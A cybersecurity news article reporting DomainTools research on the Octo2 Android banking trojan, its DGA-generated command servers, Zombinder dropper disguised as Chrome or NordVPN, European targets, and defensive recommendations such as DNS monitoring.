According to Steve Behm, Solutions Engineer at DomainTools, Octo2 represents a major change in cybersecurity threats. This updated version of the prolific Octo (ExobotCompact) family spreads rapidly due to its enhanced features, global adoption of its predecessor, and aggressive distribution tactics. 

Octo2 features improved remote access trojan capabilities, ensuring reliable communication and control over infected devices even in challenging network conditions. Moreover, its enhanced Anti-Analysis and Anti-Detection techniques can hinder security analysis and detection, making it more difficult to identify and neutralize the threat.

In addition, the use of DGA-Based C2 server generation algorithm (DGA) to create dynamic command and control (C2) server addresses adds a layer of complexity, making it harder for security systems to track and disrupt communication.

“We were eventually able to expand the original 9 domains and 7 TLDs to 269 domains and 12 TLDs first seen from August 22nd, 2024 to October 4th, 2024,” reads DomainTool’s **blog post** shared with Hackread.com ahead of publishing on October 10, 2024.

****Currently Targeting Europe****

Early samples of Octo2 have been observed in several European countries, including Italy, Poland, Moldova, and Hungary. However, given the global reach of the original Octo and the improvements in Octo2, its distribution is expected to expand rapidly. 

****Attack Pattern** – Disguised as VPN and Browser**

The malware often disguises itself as legitimate applications, such as Google Chrome, NordVPN, or “Enterprise Europe Network,” to deceive unsuspecting users. It employs a dropper called **Zombinder** to deliver the malicious payload, prompting users to install a seemingly harmless plugin that is actually Octo2.   

For your information, Zombinder is another Android malware that was actively sold on the dark web in 2022. Its developers also offered a Windows version. At that time, Zombinder was found distributing the notorious **Xenomorph banking malware**, disguised as the VidMate app.

Once a device gets infected, Octo2 allows remote access to mobile devices, intercepting push notifications, harvesting credentials, and performing unauthorized actions, such as allowing for unauthorized login and access. The **Conficker worm discovered in 2008** is one of the earliest examples of a DGA used by malware families and so far 50 malware families, including Zeus and Dyre, have been identified to be using DGA domains.

****Abusing Domain Generation Algorithms****

Octo2’s use of a DGA (Domain Generation Algorithms – Different from **Registered Domain Generation Algorithms – RDGAs**) to generate its C2 server address is a significant enhancement. This technique allows the malware to constantly change its communication endpoints, making it more resilient to takedowns and detection efforts. While researchers can identify the patterns used to generate these domains, the dynamic nature of the C2 infrastructure presents a massive threat.  

Domain Tools researchers warn users to be cautious of Octo2 malware and avoid downloading apps or software from third-party sites. For businesses, using **threat intelligence** is important. This includes advanced detection tools like sandboxing, monitoring DNS traffic for unusual activity, and using endpoint security solutions to spot malicious behaviour on infected devices. Regular DNS traffic monitoring can also help detect DGA-based malware.

1.  **Android Malware Ajina.Banker Steals 2FA Codesvia Telegram**
2.  **BingoMod Android Malware Posing as Security Apps, Wipes Data**
3.  **SMS Stealer Targeting Android Users via Malicious Apps and Ads**
4.  **Phishing Attacks Target European Bank Users on iOS and Android**
5.  **Telegram Android Vulnerability “EvilVideo” Sends Malware as Videos**

Tag

#vulnerability